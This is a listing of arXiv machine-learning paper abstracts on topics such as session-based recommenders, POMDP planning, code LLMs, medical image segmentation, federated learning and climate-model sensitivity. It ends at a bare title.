    This work introduces TRON, a scalable session-based Transformer Recommender using Optimized Negative-sampling. Motivated by the scalability and performance limitations of prevailing models such as SASRec and GRU4Rec+, TRON integrates top-k negative sampling and listwise loss functions to enhance its recommendation accuracy. Evaluations on relevant large-scale e-commerce datasets show that TRON improves upon the recommendation quality of current methods while maintaining training speeds similar to SASRec. A live A/B test yielded an 18.14% increase in click-through rate over SASRec, highlighting the potential of TRON in practical settings. For further research, we provide access to our source code at https://github.com/otto-de/TRON and an anonymized dataset at https://github.com/otto-de/recsys-dataset.
    CAR-DESPOT: Causally-Informed Online POMDP Planning for Robots in Confounded Environments. (arXiv:2304.06848v3 [cs.RO] UPDATED)
    Robots operating in real-world environments must reason about possible outcomes of stochastic actions and make decisions based on partial observations of the true world state. A major challenge for making accurate and robust action predictions is the problem of confounding, which if left untreated can lead to prediction errors. The partially observable Markov decision process (POMDP) is a widely-used framework to model these stochastic and partially-observable decision-making problems. However, due to a lack of explicit causal semantics, POMDP planning methods are prone to confounding bias and thus in the presence of unobserved confounders may produce underperforming policies. This paper presents a novel causally-informed extension of "anytime regularized determinized sparse partially observable tree" (AR-DESPOT), a modern anytime online POMDP planner, using causal modelling and inference to eliminate errors caused by unmeasured confounder variables. We further propose a method to learn offline the partial parameterisation of the causal model for planning, from ground truth model data. We evaluate our methods on a toy problem with an unobserved confounder and show that the learned causal model is highly accurate, while our planning method is more robust to confounding and produces overall higher performing policies than AR-DESPOT.
    Take-A-Photo: 3D-to-2D Generative Pre-training of Point Cloud Models. (arXiv:2307.14971v1 [cs.CV])
    With the overwhelming trend of mask image modeling led by MAE, generative pre-training has shown a remarkable potential to boost the performance of fundamental models in 2D vision. However, in 3D vision, the over-reliance on Transformer-based backbones and the unordered nature of point clouds have restricted the further development of generative pre-training. In this paper, we propose a novel 3D-to-2D generative pre-training method that is adaptable to any point cloud model. We propose to generate view images from different instructed poses via the cross-attention mechanism as the pre-training scheme. Generating view images has more precise supervision than its point cloud counterpart, thus assisting 3D backbones to have a finer comprehension of the geometrical structure and stereoscopic relations of the point cloud. Experimental results have proved the superiority of our proposed 3D-to-2D generative pre-training over previous pre-training methods. Our method is also effective in boosting the performance of architecture-oriented approaches, achieving state-of-the-art performance when fine-tuning on ScanObjectNN classification and ShapeNetPart segmentation tasks. Code is available at https://github.com/wangzy22/TAP.
    A Self-Adaptive Penalty Method for Integrating Prior Knowledge Constraints into Neural ODEs. (arXiv:2307.14940v1 [cs.LG])
    The continuous dynamics of natural systems has been effectively modelled using Neural Ordinary Differential Equations (Neural ODEs). However, for accurate and meaningful predictions, it is crucial that the models follow the underlying rules or laws that govern these systems. In this work, we propose a self-adaptive penalty algorithm for Neural ODEs to enable modelling of constrained natural systems. The proposed self-adaptive penalty function can dynamically adjust the penalty parameters. The explicit introduction of prior knowledge helps to increase the interpretability of Neural ODE -based models. We validate the proposed approach by modelling three natural systems with prior knowledge constraints: population growth, chemical reaction evolution, and damped harmonic oscillator motion. The numerical experiments and a comparison with other penalty Neural ODE approaches and \emph{vanilla} Neural ODE, demonstrate the effectiveness of the proposed self-adaptive penalty algorithm for Neural ODEs in modelling constrained natural systems. Moreover, the self-adaptive penalty approach provides more accurate and robust models with reliable and meaningful predictions.
    Multi-Source Domain Adaptation through Dataset Dictionary Learning in Wasserstein Space. (arXiv:2307.14953v1 [cs.LG])
    This paper seeks to solve Multi-Source Domain Adaptation (MSDA), which aims to mitigate data distribution shifts when transferring knowledge from multiple labeled source domains to an unlabeled target domain. We propose a novel MSDA framework based on dictionary learning and optimal transport. We interpret each domain in MSDA as an empirical distribution. As such, we express each domain as a Wasserstein barycenter of dictionary atoms, which are empirical distributions. We propose a novel algorithm, DaDiL, for learning via mini-batches: (i) atom distributions; (ii) a matrix of barycentric coordinates. Based on our dictionary, we propose two novel methods for MSDA: DaDil-R, based on the reconstruction of labeled samples in the target domain, and DaDiL-E, based on the ensembling of classifiers learned on atom distributions. We evaluate our methods in 3 benchmarks: Caltech-Office, Office 31, and CRWU, where we improved previous state-of-the-art by 3.15%, 2.29%, and 7.71% in classification performance. Finally, we show that interpolations in the Wasserstein hull of learned atoms provide data that can generalize to the target domain.
    Fading memory as inductive bias in residual recurrent networks. (arXiv:2307.14823v1 [cs.LG])
    Residual connections have been proposed as architecture-based inductive bias to mitigate the problem of exploding and vanishing gradients and increase task performance in both feed-forward and recurrent networks (RNNs) when trained with the backpropagation algorithm. Yet, little is known about how residual connections in RNNs influence their dynamics and fading memory properties. Here, we introduce weakly coupled residual recurrent networks (WCRNNs) in which residual connections result in well-defined Lyapunov exponents and allow for studying properties of fading memory. We investigate how the residual connections of WCRNNs influence their performance, network dynamics, and memory properties on a set of benchmark tasks. We show that several distinct forms of residual connections yield effective inductive biases that result in increased network expressivity. In particular, residual connections that (i) result in network dynamics at the proximity of the edge of chaos, (ii) allow networks to capitalize on characteristic spectral properties of the data, and (iii) result in heterogeneous memory properties are shown to increase practical expressivity. In addition, we demonstrate how our results can be extended to non-linear residuals and introduce a weakly coupled residual initialization scheme that can be used for Elman RNNs
    PanGu-Coder2: Boosting Large Language Models for Code with Ranking Feedback. (arXiv:2307.14936v1 [cs.CL])
    Large Language Models for Code (Code LLM) are flourishing. New and powerful models are released on a weekly basis, demonstrating remarkable performance on the code generation task. Various approaches have been proposed to boost the code generation performance of pre-trained Code LLMs, such as supervised fine-tuning, instruction tuning, reinforcement learning, etc. In this paper, we propose a novel RRTF (Rank Responses to align Test&Teacher Feedback) framework, which can effectively and efficiently boost pre-trained large language models for code generation. Under this framework, we present PanGu-Coder2, which achieves 62.20% pass@1 on the OpenAI HumanEval benchmark. Furthermore, through an extensive evaluation on CoderEval and LeetCode benchmarks, we show that PanGu-Coder2 consistently outperforms all previous Code LLMs.
    CodeLens: An Interactive Tool for Visualizing Code Representations. (arXiv:2307.14902v1 [cs.SE])
    Representing source code in a generic input format is crucial to automate software engineering tasks, e.g., applying machine learning algorithms to extract information. Visualizing code representations can further enable human experts to gain an intuitive insight into the code. Unfortunately, as of today, there is no universal tool that can simultaneously visualise different types of code representations. In this paper, we introduce a tool, CodeLens, which provides a visual interaction environment that supports various representation methods and helps developers understand and explore them. CodeLens is designed to support multiple programming languages, such as Java, Python, and JavaScript, and four types of code representations, including sequence of tokens, abstract syntax tree (AST), data flow graph (DFG), and control flow graph (CFG). By using CodeLens, developers can quickly visualize the specific code representation and also obtain the represented inputs for models of code. The Web-based interface of CodeLens is available at this http URL The demonstration video can be found at this http URL
    Verifiable Feature Attributions: A Bridge between Post Hoc Explainability and Inherent Interpretability. (arXiv:2307.15007v1 [cs.LG])
    With the increased deployment of machine learning models in various real-world applications, researchers and practitioners alike have emphasized the need for explanations of model behaviour. To this end, two broad strategies have been outlined in prior literature to explain models. Post hoc explanation methods explain the behaviour of complex black-box models by highlighting features that are critical to model predictions; however, prior work has shown that these explanations may not be faithful, and even more concerning is our inability to verify them. Specifically, it is nontrivial to evaluate if a given attribution is correct with respect to the underlying model. Inherently interpretable models, on the other hand, circumvent these issues by explicitly encoding explanations into model architecture, meaning their explanations are naturally faithful and verifiable, but they often exhibit poor predictive performance due to their limited expressive power. In this work, we aim to bridge the gap between the aforementioned strategies by proposing Verifiability Tuning (VerT), a method that transforms black-box models into models that naturally yield faithful and verifiable feature attributions. We begin by introducing a formal theoretical framework to understand verifiability and show that attributions produced by standard models cannot be verified. We then leverage this framework to propose a method to build verifiable models and feature attributions out of fully trained black-box models. Finally, we perform extensive experiments on semi-synthetic and real-world datasets, and show that VerT produces models that (1) yield explanations that are correct and verifiable and (2) are faithful to the original black-box models they are meant to explain.
    How to Scale Your EMA. (arXiv:2307.13813v2 [stat.ML] UPDATED)
    Preserving training dynamics across batch sizes is an important tool for practical machine learning as it enables the trade-off between batch size and wall-clock time. This trade-off is typically enabled by a scaling rule, for example, in stochastic gradient descent, one should scale the learning rate linearly with the batch size. Another important tool for practical machine learning is the model Exponential Moving Average (EMA), which is a model copy that does not receive gradient information, but instead follows its target model with some momentum. This model EMA can improve the robustness and generalization properties of supervised learning, stabilize pseudo-labeling, and provide a learning signal for Self-Supervised Learning (SSL). Prior works have treated the model EMA separately from optimization, leading to different training dynamics across batch sizes and lower model performance. In this work, we provide a scaling rule for optimization in the presence of model EMAs and demonstrate its validity across a range of architectures, optimizers, and data modalities. We also show the rule's validity where the model EMA contributes to the optimization of the target model, enabling us to train EMA-based pseudo-labeling and SSL methods at small and large batch sizes. For SSL, we enable training of BYOL up to batch size 24,576 without sacrificing performance, optimally a 6$\times$ wall-clock time reduction.
    Samplable Anonymous Aggregation for Private Federated Data Analysis. (arXiv:2307.15017v1 [cs.CR])
    We revisit the problem of designing scalable protocols for private statistics and private federated learning when each device holds its private data. Our first contribution is to propose a simple primitive that allows for efficient implementation of several commonly used algorithms, and allows for privacy accounting that is close to that in the central setting without requiring the strong trust assumptions it entails. Second, we propose a system architecture that implements this primitive and perform a security analysis of the proposed system.
    MCPA: Multi-scale Cross Perceptron Attention Network for 2D Medical Image Segmentation. (arXiv:2307.14588v1 [eess.IV])
    The UNet architecture, based on Convolutional Neural Networks (CNN), has demonstrated its remarkable performance in medical image analysis. However, it faces challenges in capturing long-range dependencies due to the limited receptive fields and inherent bias of convolutional operations. Recently, numerous transformer-based techniques have been incorporated into the UNet architecture to overcome this limitation by effectively capturing global feature correlations. However, the integration of the Transformer modules may result in the loss of local contextual information during the global feature fusion process. To overcome these challenges, we propose a 2D medical image segmentation model called Multi-scale Cross Perceptron Attention Network (MCPA). The MCPA consists of three main components: an encoder, a decoder, and a Cross Perceptron. The Cross Perceptron first captures the local correlations using multiple Multi-scale Cross Perceptron modules, facilitating the fusion of features across scales. The resulting multi-scale feature vectors are then spatially unfolded, concatenated, and fed through a Global Perceptron module to model global dependencies. Furthermore, we introduce a Progressive Dual-branch Structure to address the semantic segmentation of the image involving finer tissue structures. This structure gradually shifts the segmentation focus of MCPA network training from large-scale structural features to more sophisticated pixel-level features. We evaluate our proposed MCPA model on several publicly available medical image datasets from different tasks and devices, including the open large-scale dataset of CT (Synapse), MRI (ACDC), fundus camera (DRIVE, CHASE_DB1, HRF), and OCTA (ROSE). The experimental results show that our MCPA model achieves state-of-the-art performance. The code is available at https://github.com/simonustc/MCPA-for-2D-Medical-Image-Segmentation.
    Self-Contrastive Graph Diffusion Network. (arXiv:2307.14613v1 [cs.LG])
    Augmentation techniques and sampling strategies are crucial in contrastive learning, but in most existing works, augmentation techniques require careful design, and their sampling strategies can only capture a small amount of intrinsic supervision information. Additionally, the existing methods require complex designs to obtain two different representations of the data. To overcome these limitations, we propose a novel framework called the Self-Contrastive Graph Diffusion Network (SCGDN). Our framework consists of two main components: the Attentional Module (AttM) and the Diffusion Module (DiFM). AttM aggregates higher-order structure and feature information to get an excellent embedding, while DiFM balances the state of each node in the graph through Laplacian diffusion learning and allows the cooperative evolution of adjacency and feature information in the graph. Unlike existing methodologies, SCGDN is an augmentation-free approach that avoids "sampling bias" and semantic drift, without the need for pre-training. We conduct a high-quality sampling of samples based on structure and feature information. If two nodes are neighbors, they are considered positive samples of each other. If two disconnected nodes are also unrelated on $k$NN graph, they are considered negative samples for each other. The contrastive objective reasonably uses our proposed sampling strategies, and the redundancy reduction term minimizes redundant information in the embedding and can well retain more discriminative information. In this novel framework, the graph self-contrastive learning paradigm gives expression to a powerful force. SCGDN effectively balances between preserving high-order structure information and avoiding overfitting. The results manifest that SCGDN can consistently generate outperformance over both the contrastive methods and the classical methods.
    Function Value Learning: Adaptive Learning Rates Based on the Polyak Stepsize and Function Splitting in ERM. (arXiv:2307.14528v1 [cs.LG])
    Here we develop variants of SGD (stochastic gradient descent) with an adaptive step size that make use of the sampled loss values. In particular, we focus on solving a finite sum-of-terms problem, also known as empirical risk minimization. We first detail an idealized adaptive method called $\texttt{SPS}_+$ that makes use of the sampled loss values and assumes knowledge of the sampled loss at optimality. This $\texttt{SPS}_+$ is a minor modification of the SPS (Stochastic Polyak Stepsize) method, where the step size is enforced to be positive. We then show that $\texttt{SPS}_+$ achieves the best known rates of convergence for SGD in the Lipschitz non-smooth. We then move onto to develop $\texttt{FUVAL}$, a variant of $\texttt{SPS}_+$ where the loss values at optimality are gradually learned, as opposed to being given. We give three viewpoints of $\texttt{FUVAL}$, as a projection based method, as a variant of the prox-linear method, and then as a particular online SGD method. We then present a convergence analysis of $\texttt{FUVAL}$ and experimental results. The shortcomings of our work is that the convergence analysis of $\texttt{FUVAL}$ shows no advantage over SGD. Another shortcomming is that currently only the full batch version of $\texttt{FUVAL}$ shows a minor advantages of GD (Gradient Descent) in terms of sensitivity to the step size. The stochastic version shows no clear advantage over SGD. We conjecture that large mini-batches are required to make $\texttt{FUVAL}$ competitive. Currently the new $\texttt{FUVAL}$ method studied in this paper does not offer any clear theoretical or practical advantage. We have chosen to make this draft available online nonetheless because of some of the analysis techniques we use, such as the non-smooth analysis of $\texttt{SPS}_+$, and also to show an apparently interesting approach that currently does not work.
    A LLM Assisted Exploitation of AI-Guardian. (arXiv:2307.15008v1 [cs.CR])
    Large language models (LLMs) are now highly capable at a diverse range of tasks. This paper studies whether or not GPT-4, one such LLM, is capable of assisting researchers in the field of adversarial machine learning. As a case study, we evaluate the robustness of AI-Guardian, a recent defense to adversarial examples published at IEEE S&P 2023, a top computer security conference. We completely break this defense: the proposed scheme does not increase robustness compared to an undefended baseline. We write none of the code to attack this model, and instead prompt GPT-4 to implement all attack algorithms following our instructions and guidance. This process was surprisingly effective and efficient, with the language model at times producing code from ambiguous instructions faster than the author of this paper could have done. We conclude by discussing (1) the warning signs present in the evaluation that suggested to us AI-Guardian would be broken, and (2) our experience with designing attacks and performing novel research using the most recent advances in language modeling.
    Bug Characterization in Machine Learning-based Systems. (arXiv:2307.14512v1 [cs.SE])
    Rapid growth of applying Machine Learning (ML) in different domains, especially in safety-critical areas, increases the need for reliable ML components, i.e., a software component operating based on ML. Understanding the bugs characteristics and maintenance challenges in ML-based systems can help developers of these systems to identify where to focus maintenance and testing efforts, by giving insights into the most error-prone components, most common bugs, etc. In this paper, we investigate the characteristics of bugs in ML-based software systems and the difference between ML and non-ML bugs from the maintenance viewpoint. We extracted 447,948 GitHub repositories that used one of the three most popular ML frameworks, i.e., TensorFlow, Keras, and PyTorch. After multiple filtering steps, we select the top 300 repositories with the highest number of closed issues. We manually investigate the extracted repositories to exclude non-ML-based systems. Our investigation involved a manual inspection of 386 sampled reported issues in the identified ML-based systems to indicate whether they affect ML components or not. Our analysis shows that nearly half of the real issues reported in ML-based systems are ML bugs, indicating that ML components are more error-prone than non-ML components. Next, we thoroughly examined 109 identified ML bugs to identify their root causes, symptoms, and calculate their required fixing time. The results also revealed that ML bugs have significantly different characteristics compared to non-ML bugs, in terms of the complexity of bug-fixing (number of commits, changed files, and changed lines of code). Based on our results, fixing ML bugs are more costly and ML components are more error-prone, compared to non-ML bugs and non-ML components respectively. Hence, paying a significant attention to the reliability of the ML components is crucial in ML-based systems.
    MVMR-FS : Non-parametric feature selection algorithm based on Maximum inter-class Variation and Minimum Redundancy. (arXiv:2307.14643v1 [cs.LG])
    How to accurately measure the relevance and redundancy of features is an age-old challenge in the field of feature selection. However, existing filter-based feature selection methods cannot directly measure redundancy for continuous data. In addition, most methods rely on manually specifying the number of features, which may introduce errors in the absence of expert knowledge. In this paper, we propose a non-parametric feature selection algorithm based on maximum inter-class variation and minimum redundancy, abbreviated as MVMR-FS. We first introduce supervised and unsupervised kernel density estimation on the features to capture their similarities and differences in inter-class and overall distributions. Subsequently, we present the criteria for maximum inter-class variation and minimum redundancy (MVMR), wherein the inter-class probability distributions are employed to reflect feature relevance and the distances between overall probability distributions are used to quantify redundancy. Finally, we employ an AGA to search for the feature subset that minimizes the MVMR. Compared with ten state-of-the-art methods, MVMR-FS achieves the highest average accuracy and improves the accuracy by 5% to 11%.
    Predictive Maintenance of Armoured Vehicles using Machine Learning Approaches. (arXiv:2307.14453v1 [cs.LG])
    Armoured vehicles are specialized and complex pieces of machinery designed to operate in high-stress environments, often in combat or tactical situations. This study proposes a predictive maintenance-based ensemble system that aids in predicting potential maintenance needs based on sensor data collected from these vehicles. The proposed model's architecture involves various models such as Light Gradient Boosting, Random Forest, Decision Tree, Extra Tree Classifier and Gradient Boosting to predict the maintenance requirements of the vehicles accurately. In addition, K-fold cross validation, along with TOPSIS analysis, is employed to evaluate the proposed ensemble model's stability. The results indicate that the proposed system achieves an accuracy of 98.93%, precision of 99.80% and recall of 99.03%. The algorithm can effectively predict maintenance needs, thereby reducing vehicle downtime and improving operational efficiency. Through comparisons between various algorithms and the suggested ensemble, this study highlights the potential of machine learning-based predictive maintenance solutions.
    Open Problems in Computer Vision for Wilderness SAR and The Search for Patricia Wu-Murad. (arXiv:2307.14527v1 [cs.CV])
    This paper details the challenges in applying two computer vision systems, an EfficientDET supervised learning model and the unsupervised RX spectral classifier, to 98.9 GB of drone imagery from the Wu-Murad wilderness search and rescue (WSAR) effort in Japan and identifies 3 directions for future research. There have been at least 19 proposed approaches and 3 datasets aimed at locating missing persons in drone imagery, but only 3 approaches (2 unsupervised and 1 of an unknown structure) are referenced in the literature as having been used in an actual WSAR operation. Of these proposed approaches, the EfficientDET architecture and the unsupervised spectral RX classifier were selected as the most appropriate for this setting. The EfficientDET model was applied to the HERIDAL dataset and despite achieving performance that is statistically equivalent to the state-of-the-art, the model fails to translate to the real world in terms of false positives (e.g., identifying tree limbs and rocks as people), and false negatives (e.g., failing to identify members of the search team). The poor results in practice for algorithms that showed good results on datasets suggest 3 areas of future research: more realistic datasets for wilderness SAR, computer vision models that are capable of seamlessly handling the variety of imagery that can be collected during actual WSAR operations, and better alignment on performance measures.
    Counterfactual Explanations for Graph Classification Through the Lenses of Density. (arXiv:2307.14849v1 [cs.LG])
    Counterfactual examples have emerged as an effective approach to produce simple and understandable post-hoc explanations. In the context of graph classification, previous work has focused on generating counterfactual explanations by manipulating the most elementary units of a graph, i.e., removing an existing edge, or adding a non-existing one. In this paper, we claim that such language of explanation might be too fine-grained, and turn our attention to some of the main characterizing features of real-world complex networks, such as the tendency to close triangles, the existence of recurring motifs, and the organization into dense modules. We thus define a general density-based counterfactual search framework to generate instance-level counterfactual explanations for graph classifiers, which can be instantiated with different notions of dense substructures. In particular, we show two specific instantiations of this general framework: a method that searches for counterfactual graphs by opening or closing triangles, and a method driven by maximal cliques. We also discuss how the general method can be instantiated to exploit any other notion of dense substructures, including, for instance, a given taxonomy of nodes. We evaluate the effectiveness of our approaches in 7 brain network datasets and compare the counterfactual statements generated according to several widely-used metrics. Results confirm that adopting a semantic-relevant unit of change like density is essential to define versatile and interpretable counterfactual explanation methods.
    Linear Convergence of Black-Box Variational Inference: Should We Stick the Landing?. (arXiv:2307.14642v1 [stat.ML])
    We prove that black-box variational inference (BBVI) with control variates, particularly the sticking-the-landing (STL) estimator, converges at a geometric (traditionally called "linear") rate under perfect variational family specification. In particular, we prove a quadratic bound on the gradient variance of the STL estimator, one which encompasses misspecified variational families. Combined with previous works on the quadratic variance condition, this directly implies convergence of BBVI with the use of projected stochastic gradient descent. We also improve existing analysis on the regular closed-form entropy gradient estimators, which enables comparison against the STL estimator and provides explicit non-asymptotic complexity guarantees for both.
    2D-Shapley: A Framework for Fragmented Data Valuation. (arXiv:2306.10473v2 [cs.LG] UPDATED)
    Data valuation -- quantifying the contribution of individual data sources to certain predictive behaviors of a model -- is of great importance to enhancing the transparency of machine learning and designing incentive systems for data sharing. Existing work has focused on evaluating data sources with the shared feature or sample space. How to valuate fragmented data sources of which each only contains partial features and samples remains an open question. We start by presenting a method to calculate the counterfactual of removing a fragment from the aggregated data matrix. Based on the counterfactual calculation, we further propose 2D-Shapley, a theoretical framework for fragmented data valuation that uniquely satisfies some appealing axioms in the fragmented data context. 2D-Shapley empowers a range of new use cases, such as selecting useful data fragments, providing interpretation for sample-wise data values, and fine-grained data issue diagnosis.
    How Good is Google Bard's Visual Understanding? An Empirical Study on Open Challenges. (arXiv:2307.15016v1 [cs.CV])
    Google's Bard has emerged as a formidable competitor to OpenAI's ChatGPT in the field of conversational AI. Notably, Bard has recently been updated to handle visual inputs alongside text prompts during conversations. Given Bard's impressive track record in handling textual inputs, we explore its capabilities in understanding and interpreting visual data (images) conditioned by text questions. This exploration holds the potential to unveil new insights and challenges for Bard and other forthcoming multi-modal Generative models, especially in addressing complex computer vision problems that demand accurate visual and language understanding. Specifically, in this study, we focus on 15 diverse task scenarios encompassing regular, camouflaged, medical, under-water and remote sensing data to comprehensively evaluate Bard's performance. Our primary finding indicates that Bard still struggles in these vision scenarios, highlighting the significant gap in vision-based understanding that needs to be bridged in future developments. We expect that this empirical study will prove valuable in advancing future models, leading to enhanced capabilities in comprehending and interpreting fine-grained visual data. Our project is released on https://github.com/htqin/GoogleBard-VisUnderstand
    A Strategic Framework for Optimal Decisions in Football 1-vs-1 Shot-Taking Situations: An Integrated Approach of Machine Learning, Theory-Based Modeling, and Game Theory. (arXiv:2307.14732v1 [cs.LG])
    Complex interactions between two opposing agents frequently occur in domains of machine learning, game theory, and other application domains. Quantitatively analyzing the strategies involved can provide an objective basis for decision-making. One such critical scenario is shot-taking in football, where decisions, such as whether the attacker should shoot or pass the ball and whether the defender should attempt to block the shot, play a crucial role in the outcome of the game. However, there are currently no effective data-driven and/or theory-based approaches to analyzing such situations. To address this issue, we proposed a novel framework to analyze such scenarios based on game theory, where we estimate the expected payoff with machine learning (ML) models, and additional features for ML models were extracted with a theory-based shot block model. Conventionally, successes or failures (1 or 0) are used as payoffs, while a success shot (goal) is extremely rare in football. Therefore, we proposed the Expected Probability of Shot On Target (xSOT) metric to evaluate players' actions even if the shot results in no goal; this allows for effective differentiation and comparison between different shots and even enables counterfactual shot situation analysis. In our experiments, we have validated the framework by comparing it with baseline and ablated models. Furthermore, we have observed a high correlation between the xSOT and existing metrics. This alignment of information suggests that xSOT provides valuable insights. Lastly, as an illustration, we studied optimal strategies in the World Cup 2022 and analyzed a shot situation in EURO 2020.
    Generative convective parametrization of dry atmospheric boundary layer. (arXiv:2307.14857v1 [physics.flu-dyn])
    Turbulence parametrizations will remain a necessary building block in kilometer-scale Earth system models. In convective boundary layers, where the mean vertical gradients of conserved properties such as potential temperature and moisture are approximately zero, the standard ansatz which relates turbulent fluxes to mean vertical gradients via an eddy diffusivity has to be extended by mass flux parametrizations for the typically asymmetric up- and downdrafts in the atmospheric boundary layer. In this work, we present a parametrization for a dry convective boundary layer based on a generative adversarial network. The model incorporates the physics of self-similar layer growth following from the classical mixed layer theory by Deardorff. This enhances the training data base of the generative machine learning algorithm and thus significantly improves the predicted statistics of the synthetically generated turbulence fields at different heights inside the boundary layer. The algorithm training is based on fully three-dimensional direct numerical simulation data. Differently to stochastic parametrizations, our model is able to predict the highly non-Gaussian transient statistics of buoyancy fluctuations, vertical velocity, and buoyancy flux at different heights thus also capturing the fastest thermals penetrating into the stabilized top region. The results of our generative algorithm agree with standard two-equation or multi-plume stochastic mass-flux schemes. The present parametrization provides additionally the granule-type horizontal organization of the turbulent convection which cannot be obtained in any of the other model closures. Our work paves the way to efficient data-driven convective parametrizations in other natural flows, such as moist convection, upper ocean mixing, or convection in stellar interiors.
    Thinker: Learning to Plan and Act. (arXiv:2307.14993v1 [cs.AI])
    We propose the Thinker algorithm, a novel approach that enables reinforcement learning agents to autonomously interact with and utilize a learned world model. The Thinker algorithm wraps the environment with a world model and introduces new actions designed for interacting with the world model. These model-interaction actions enable agents to perform planning by proposing alternative plans to the world model before selecting a final action to execute in the environment. This approach eliminates the need for hand-crafted planning algorithms by enabling the agent to learn how to plan autonomously and allows for easy interpretation of the agent's plan with visualization. We demonstrate the algorithm's effectiveness through experimental results in the game of Sokoban and the Atari 2600 benchmark, where the Thinker algorithm achieves state-of-the-art performance and competitive results, respectively. Visualizations of agents trained with the Thinker algorithm demonstrate that they have learned to plan effectively with the world model to select better actions. The algorithm's generality opens a new research direction on how a world model can be used in reinforcement learning and how planning can be seamlessly integrated into an agent's decision-making process.
    BubbleML: A Multi-Physics Dataset and Benchmarks for Machine Learning. (arXiv:2307.14623v1 [cs.LG])
    In the field of phase change phenomena, the lack of accessible and diverse datasets suitable for machine learning (ML) training poses a significant challenge. Existing experimental datasets are often restricted, with limited availability and sparse ground truth data, impeding our understanding of this complex multi-physics phenomena. To bridge this gap, we present the BubbleML Dataset(https://github.com/HPCForge/BubbleML) which leverages physics-driven simulations to provide accurate ground truth information for various boiling scenarios, encompassing nucleate pool boiling, flow boiling, and sub-cooled boiling. This extensive dataset covers a wide range of parameters, including varying gravity conditions, flow rates, sub-cooling levels, and wall superheat, comprising 51 simulations. BubbleML is validated against experimental observations and trends, establishing it as an invaluable resource for ML research. Furthermore, we showcase its potential to facilitate exploration of diverse downstream tasks by introducing two benchmarks: (a) optical flow analysis to capture bubble dynamics, and (b) operator networks for learning temperature dynamics. The BubbleML dataset and its benchmarks serve as a catalyst for advancements in ML-driven research on multi-physics phase change phenomena, enabling the development and comparison of state-of-the-art techniques and models.
    Benchmarking Performance of Deep Learning Model for Material Segmentation on Two HPC Systems. (arXiv:2307.14921v1 [cs.PF])
    Performance Benchmarking of HPC systems is an ongoing effort that seeks to provide information that will allow for increased performance and improve the job schedulers that manage these systems. We develop a benchmarking tool that utilizes machine learning models and gathers performance data on GPU-accelerated nodes while they perform material segmentation analysis. The benchmark uses a ML model that has been converted from Caffe to PyTorch using the MMdnn toolkit and the MINC-2500 dataset. Performance data is gathered on two ERDC DSRC systems, Onyx and Vulcanite. The data reveals that while Vulcanite has faster model times in a large number of benchmarks, and it is also more subject to some environmental factors that can cause performances slower than Onyx. In contrast the model times from Onyx are consistent across benchmarks.
    Graph-based Polyphonic Multitrack Music Generation. (arXiv:2307.14928v1 [cs.SD])
    Graphs can be leveraged to model polyphonic multitrack symbolic music, where notes, chords and entire sections may be linked at different levels of the musical hierarchy by tonal and rhythmic relationships. Nonetheless, there is a lack of works that consider graph representations in the context of deep learning systems for music generation. This paper bridges this gap by introducing a novel graph representation for music and a deep Variational Autoencoder that generates the structure and the content of musical graphs separately, one after the other, with a hierarchical architecture that matches the structural priors of music. By separating the structure and content of musical graphs, it is possible to condition generation by specifying which instruments are played at certain times. This opens the door to a new form of human-computer interaction in the context of music co-creation. After training the model on existing MIDI datasets, the experiments show that the model is able to generate appealing short and long musical sequences and to realistically interpolate between them, producing music that is tonally and rhythmically consistent. Finally, the visualization of the embeddings shows that the model is able to organize its latent space in accordance with known musical concepts.
    Federated Model Aggregation via Self-Supervised Priors for Highly Imbalanced Medical Image Classification. (arXiv:2307.14959v1 [cs.CV])
    In the medical field, federated learning commonly deals with highly imbalanced datasets, including skin lesions and gastrointestinal images. Existing federated methods under highly imbalanced datasets primarily focus on optimizing a global model without incorporating the intra-class variations that can arise in medical imaging due to different populations, findings, and scanners. In this paper, we study the inter-client intra-class variations with publicly available self-supervised auxiliary networks. Specifically, we find that employing a shared auxiliary pre-trained model, like MoCo-V2, locally on every client yields consistent divergence measurements. Based on these findings, we derive a dynamic balanced model aggregation via self-supervised priors (MAS) to guide the global model optimization. Fed-MAS can be utilized with different local learning methods for effective model aggregation toward a highly robust and unbiased global model. Our code is available at \url{https://github.com/xmed-lab/Fed-MAS}.
    Training Quantum Boltzmann Machines with Coresets. (arXiv:2307.14459v1 [quant-ph])
    Recent work has proposed and explored using coreset techniques for quantum algorithms that operate on classical data sets to accelerate the applicability of these algorithms on near-term quantum devices. We apply these ideas to Quantum Boltzmann Machines (QBM) where gradient-based steps which require Gibbs state sampling are the main computational bottleneck during training. By using a coreset in place of the full data set, we try to minimize the number of steps needed and accelerate the overall training time. In a regime where computational time on quantum computers is a precious resource, we propose this might lead to substantial practical savings. We evaluate this approach on 6x6 binary images from an augmented bars and stripes data set using a QBM with 36 visible units and 8 hidden units. Using an Inception score inspired metric, we compare QBM training times with and without using coresets.
    Machine Learning based Parameter Sensitivity of Regional Climate Models -- A Case Study of the WRF Model for Heat Extremes over Southeast Australia. (arXiv:2307.14654v1 [physics.ao-ph])
    Heatwaves and bushfires cause substantial impacts on society and ecosystems across the globe. Accurate information of heat extremes is needed to support the development of actionable mitigation and adaptation strategies. Regional climate models are commonly used to better understand the dynamics of these events. These models have very large input parameter sets, and the parameters within the physics schemes substantially influence the model's performance. However, parameter sensitivity analysis (SA) of regional models for heat extremes is largely unexplored. Here, we focus on the southeast Australian region, one of the global hotspots of heat extremes. In southeast Australia Weather Research and Forecasting (WRF) model is the widely used regional model to simulate extreme weather events across the region. Hence in this study, we focus on the sensitivity of WRF model parameters to surface meteorological variables such as temperature, relative humidity, and wind speed during two extreme heat events over southeast Australia. Due to the presence of multiple parameters and their complex relationship with output variables, a machine learning (ML) surrogate-based global sensitivity analysis method is considered for the SA. The ML surrogate-based Sobol SA is used to identify the sensitivity of 24 adjustable parameters in seven different physics schemes of the WRF model. Results show that out of these 24, only three parameters, namely the scattering tuning parameter, multiplier of saturated soil water content, and profile shape exponent in the momentum diffusivity coefficient, are important for the considered meteorological variables. These SA results are consistent for the two different extreme heat events. Further, we investigated the physical significance of sensitive parameters. This study's results will help in further optimising WRF parameters to improve model simulation.
    Prediction of wind turbines power with physics-informed neural networks and evidential uncertainty quantification. (arXiv:2307.14675v1 [cs.LG])
